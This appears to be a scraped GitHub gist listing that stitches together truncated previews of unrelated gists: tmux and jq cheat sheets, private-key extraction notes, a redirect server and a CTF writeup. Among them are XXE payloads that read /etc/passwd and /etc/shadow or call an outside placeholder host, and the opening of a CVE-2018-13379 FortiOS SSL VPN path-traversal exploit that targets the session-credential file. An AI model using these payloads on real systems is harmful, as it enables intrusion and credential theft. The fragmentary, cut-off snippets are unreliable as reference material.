Rafael ChOkO ChOkO08

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name:

@derrickorama
derrickorama / make-cert-and-pk.md
Last active April 17, 2024 23:10
Extracting certs/private keys from certificates that disable private key exporting

Situation

  • I have to use a Windows client to install a certificate (say via the Magnum PKI Client)
  • I cannot export the private key for this certificate
  • I am a Linux user that needs to have the cert and private key

Solution (steps)

Install/export certificate using Windows VM

@staaldraad
staaldraad / XXE_payloads
Last active July 27, 2024 02:22
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@shreddd
shreddd / redirect.py
Created September 30, 2015 21:14
Simple Redirect Server in python to redirect requests to a specified URL
#!/usr/bin/env python
"""
Simple HTTP URL redirector
Shreyas Cholia 10/01/2015
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url
HTTP redirect server
positional arguments:
@olih
olih / jq-cheetsheet.md
Last active July 16, 2024 23:02
jq Cheet Sheet

Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.

Installing jq

On Mac OS

brew install jq

@jh00nbr
jh00nbr / solver_we_also_have_memes.py
Last active February 1, 2024 04:21
Writeup - Challenge - We also have memes! - 3DS-CTF
from PIL import Image
import sys
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org
# Writeup - We also have memes!- 3DS-CTF
# Playing other CTFs, our team discovered an awesome algorithm to hide messages in a PNG file.
# One member of the team said that it is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hid a message in this meme and gave it to us to solve.
# Prove that he's wrong!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
@worldofprasanna
worldofprasanna / terminal-capture.md
Last active July 15, 2024 17:45
Multiple screen terminal capture using asciinema & tmux

Commands Reference

  1. Start a new tmux named session: tmux new -s terminal-capture
  2. Split the screen using these commands,
     • vertical split <C-b>"
     • horizontal split <C-b>%
  3. To navigate between the panes,
     • To go to Left pane <C-b> left-key
     • To go to Right pane <C-b> right-key
     • To go to Top pane up-key
@code-machina
code-machina / CVE-2018-13379.py
Last active May 29, 2023 03:33
CVE-2018-13379 : A path traversal vulnerability in the FortiOS SSL VPN web portal
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing
def checkIP(ip):
    try:
        url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"